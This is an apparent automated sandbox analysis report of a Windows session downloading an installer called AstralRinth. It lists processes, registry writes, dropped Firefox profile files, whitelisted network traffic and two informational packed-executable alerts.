c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3016
CMD: "C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=false" /installsource otherinstallcmd /sessionid "{DAC746F5-C730-4534-8DC9-C6C5BDC0471D}" /silent
Path: C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
Parent process: MicrosoftEdgeUpdate.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Edge Update
Exit code: 0
Version: 1.3.195.45
Modules (images):
c:\users\admin\appdata\local\microsoft\edgeupdate\microsoftedgeupdate.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\ucrtbase.dll
PID: 3028
CMD: "C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" -Embedding
Path: C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Edge Update
Exit code: 0
Version: 1.3.195.45
Modules (images):
c:\users\admin\appdata\local\microsoft\edgeupdate\microsoftedgeupdate.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\ucrtbase.dll
Total events: 43 016
Read events: 40 061
Write events: 2 867
Delete events: 88

Modification events

(PID) Process: (3896) firefox.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\DllPrefetchExperiment
Operation: write
Name: C:\Program Files\Mozilla Firefox\firefox.exe
Value: 0

(PID) Process: (3896) firefox.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation: write
Name: SlowContextMenuEntries
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000

(PID) Process: (9184) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (9184) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (9184) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (2692) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (2692) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (2692) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (4120) MicrosoftEdgeUpdate.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe
Operation: write
Name: DisableExceptionChainValidation
Value: 0

(PID) Process: (8612) BackgroundTransferHost.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation: write
Name: CachePrefix
Value:
Executable files: 419
Suspicious files: 321
Text files: 78
Unknown types: 1

Dropped files

PID: 3896  Process: firefox.exe
Filename: C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-current.bin
MD5:
SHA256:

PID: 3896  Process: firefox.exe
Filename: C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\sessionCheckpoints.json
Type: binary
MD5: EA8B62857DFDBD3D0BE7D7E4A954EC9A
SHA256: 792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA

PID: 3896  Process: firefox.exe
Filename: C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\cookies.sqlite-shm
Type: binary
MD5: B7C14EC6110FA820CA6B65F5AEC85911
SHA256: FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB

PID: 3896  Process: firefox.exe
Filename: C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Type: binary
MD5: B7C14EC6110FA820CA6B65F5AEC85911
SHA256: FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB

PID: 3896  Process: firefox.exe
Filename: C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
MD5:
SHA256:

PID: 3896  Process: firefox.exe
Filename: C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\sessionCheckpoints.json.tmp
Type: binary
MD5: EA8B62857DFDBD3D0BE7D7E4A954EC9A
SHA256: 792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA

PID: 3896  Process: firefox.exe
Filename: C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\prefs-1.js
Type: text
MD5: 94E06FA66A4ED391F2B6B04DEE0EE9B0
SHA256: 54C5ACF30F5E9E06E754416E30ECC5BF9FE2D9B47AB9FCFA6891184D813D2C27

PID: 3896  Process: firefox.exe
Filename: C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Type: binary
MD5: B7C14EC6110FA820CA6B65F5AEC85911
SHA256: FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB

PID: 3896  Process: firefox.exe
Filename: C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Type: binary
MD5: B7C14EC6110FA820CA6B65F5AEC85911
SHA256: FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB

PID: 3896  Process: firefox.exe
Filename: C:\Users\admin\Downloads\AstralRinth.PA55LYDa.App_0.9.301_x64-setup.exe.part
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 33
TCP/UDP connections: 130
DNS requests: 166
Threats: 2

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
6544 | svchost.exe | GET | 200 | 23.54.109.203:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.141:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
3896 | firefox.exe | GET | 200 | 34.107.221.82:80 | http://detectportal.firefox.com/canonical.html | unknown | whitelisted
3896 | firefox.exe | GET | 200 | 34.107.221.82:80 | http://detectportal.firefox.com/success.txt?ipv4 | unknown | whitelisted
3896 | firefox.exe | POST | 200 | 172.64.149.23:80 | http://ocsp.sectigo.com/ | unknown | whitelisted
3896 | firefox.exe | POST | 200 | 172.217.16.131:80 | http://o.pki.goog/we2 | unknown | whitelisted
3896 | firefox.exe | POST | 200 | 172.217.16.131:80 | http://o.pki.goog/s/wr3/cgo | unknown | whitelisted
3896 | firefox.exe | POST | 200 | 184.24.77.62:80 | http://r10.o.lencr.org/ | unknown | whitelisted
3896 | firefox.exe | POST | 200 | 184.24.77.62:80 | http://r10.o.lencr.org/ | unknown | whitelisted
3896 | firefox.exe | POST | 200 | 172.217.16.131:80 | http://o.pki.goog/s/wr3/UTA | unknown | whitelisted
(Type and Size columns are only available in the full report.)

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 192.168.100.255:138 | - | - | - | whitelisted
5496 | MoUsoCoreWorker.exe | 23.48.23.141:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
- | - | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3216 | svchost.exe | 40.115.3.253:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 20.190.160.132:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 23.54.109.203:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted
3896 | firefox.exe | 34.107.221.82:80 | detectportal.firefox.com | GOOGLE | US | whitelisted
3896 | firefox.exe | 140.82.121.3:443 | github.com | GITHUB | US | whitelisted
3896 | firefox.exe | 34.117.188.166:443 | contile.services.mozilla.com | - | - | whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.110
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.141
  • 23.48.23.159
  • 23.48.23.143
  • 23.48.23.140
  • 23.48.23.158
  • 23.48.23.145
  • 23.48.23.147
  • 23.48.23.161
  • 23.48.23.150
  • 23.48.23.173
  • 23.48.23.167
  • 23.48.23.181
  • 23.48.23.166
  • 23.48.23.176
  • 23.48.23.183
  • 23.48.23.180
  • 23.48.23.169
  • 23.48.23.168
whitelisted
client.wns.windows.com
  • 40.115.3.253
  • 40.113.110.67
whitelisted
login.live.com
  • 20.190.160.132
  • 40.126.32.140
  • 20.190.160.64
  • 20.190.160.131
  • 20.190.160.2
  • 20.190.160.67
  • 20.190.160.66
  • 40.126.32.138
whitelisted
ocsp.digicert.com
  • 23.54.109.203
whitelisted
detectportal.firefox.com
  • 34.107.221.82
whitelisted
github.com
  • 140.82.121.3
  • 140.82.121.4
whitelisted
prod.detectportal.prod.cloudops.mozgcp.net
  • 34.107.221.82
  • 2600:1901:0:38d7::
whitelisted
contile.services.mozilla.com
  • 34.117.188.166
whitelisted

Threats

PID | Process | Class | Message
- | - | Misc activity | ET INFO Packed Executable Download
- | - | Misc activity | ET INFO Packed Executable Download
No debug info